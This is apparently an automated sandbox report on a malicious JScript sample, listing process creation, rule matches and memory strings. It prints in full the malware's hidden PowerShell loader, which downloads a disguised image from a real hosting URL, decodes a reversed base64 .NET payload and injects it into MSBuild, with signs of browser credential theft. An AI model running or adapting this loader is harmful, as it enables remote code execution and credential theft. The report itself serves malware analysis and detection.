                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2284010_2_04A22840
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2A84010_2_04A2A840
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A229A010_2_04A229A0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AEA9A610_2_04AEA9A6
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3696210_2_04A36962
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A1EA8010_2_04A1EA80
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD6BD710_2_04AD6BD7
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADAB4010_2_04ADAB40
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADF43F10_2_04ADF43F
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A1146010_2_04A11460
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ABD5B010_2_04ABD5B0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AE95C310_2_04AE95C3
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD757110_2_04AD7571
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD16CC10_2_04AD16CC
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A6563010_2_04A65630
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADF7B010_2_04ADF7B0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD70E910_2_04AD70E9
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADF0E010_2_04ADF0E0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ACF0CC10_2_04ACF0CC
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A270C010_2_04A270C0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2B1B010_2_04A2B1B0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AEB16B10_2_04AEB16B
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A5516C10_2_04A5516C
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A0F17210_2_04A0F172
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A252A010_2_04A252A0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AC12ED10_2_04AC12ED
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3D2F010_2_04A3D2F0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3B2C010_2_04A3B2C0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A6739A10_2_04A6739A
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD132D10_2_04AD132D
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A0D34C10_2_04A0D34C
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADFCF210_2_04ADFCF2
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A99C3210_2_04A99C32
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3FDC010_2_04A3FDC0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD7D7310_2_04AD7D73
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A23D4010_2_04A23D40
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD1D5A10_2_04AD1D5A
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A29EB010_2_04A29EB0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADFFB110_2_04ADFFB1
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A21F9210_2_04A21F92
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_049E3FD510_2_049E3FD5
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_049E3FD210_2_049E3FD2
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADFF0910_2_04ADFF09
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A238E010_2_04A238E0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A8D80010_2_04A8D800
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AB591010_2_04AB5910
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A2995010_2_04A29950
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3B95010_2_04A3B950
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A65AA010_2_04A65AA0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ABDAAC10_2_04ABDAAC
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AC1AA310_2_04AC1AA3
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ACDAC610_2_04ACDAC6
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A93A6C10_2_04A93A6C
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADFA4910_2_04ADFA49
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04AD7A4610_2_04AD7A46
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A3FB8010_2_04A3FB80
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A95BF010_2_04A95BF0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04A5DBF910_2_04A5DBF9
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_04ADFB7610_2_04ADFB76
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B120F010_2_02B120F0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0CFE010_2_02B0CFE0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0D20010_2_02B0D200
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0B33510_2_02B0B335
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0B34010_2_02B0B340
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0118810_2_02B01188
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0B1F010_2_02B0B1F0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B0B1E710_2_02B0B1E7
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B157C010_2_02B157C0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B139D010_2_02B139D0
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B139CB10_2_02B139CB
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B2BF1010_2_02B2BF10
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048CE5EC10_2_048CE5EC
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048CD6B810_2_048CD6B8
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048D522410_2_048D5224
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_048CE25710_2_048CE257
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_000001BADB83922411_2_000001BADB839224
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_000001BADB83225711_2_000001BADB832257
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_000001BADB8325EC11_2_000001BADB8325EC
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_000001BADB8316B811_2_000001BADB8316B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 013D5130 appears 58 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0140EA12 appears 86 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0141F290 appears 103 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0138B970 appears 262 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 013E7E54 appears 107 times
                  Source: C:\Windows\SysWOW64\choice.exeCode function: String function: 04A8EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\choice.exeCode function: String function: 04A0B970 appears 262 times
                  Source: C:\Windows\SysWOW64\choice.exeCode function: String function: 04A67E54 appears 107 times
                  Source: C:\Windows\SysWOW64\choice.exeCode function: String function: 04A9F290 appears 103 times
                  Source: C:\Windows\SysWOW64\choice.exeCode function: String function: 04A55130 appears 58 times
                  Source: 1013911.jsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\cscript.exeProcess created: Commandline size = 4823
                  Source: C:\Windows\System32\cscript.exeProcess created: Commandline size = 4823Jump to behavior
                  Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, TaskLoader.csTask registration methods: 'CreateTask'
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                  Source: 10.2.choice.exe.2c55318.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 10.2.choice.exe.2c55318.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 10.2.choice.exe.2c55318.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.choice.exe.500cd14.3.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 10.2.choice.exe.500cd14.3.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 11.2.firefox.exe.1ba1cd14.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 11.2.firefox.exe.1ba1cd14.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 11.2.firefox.exe.1ba1cd14.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.choice.exe.500cd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 10.2.choice.exe.500cd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 10.2.choice.exe.500cd14.3.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 0.2.wscript.exe.1f1acd14.0.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.choice.exe.2c55318.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 10.2.choice.exe.2c55318.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 11.2.firefox.exe.1ba1cd14.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 11.2.firefox.exe.1ba1cd14.0.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: *.sln
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
                  Source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winJS@15/9@3/3
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\69SP6[1].txtJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ostaxa.jsJump to behavior
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002CE9000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEw
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                  Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.jsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AY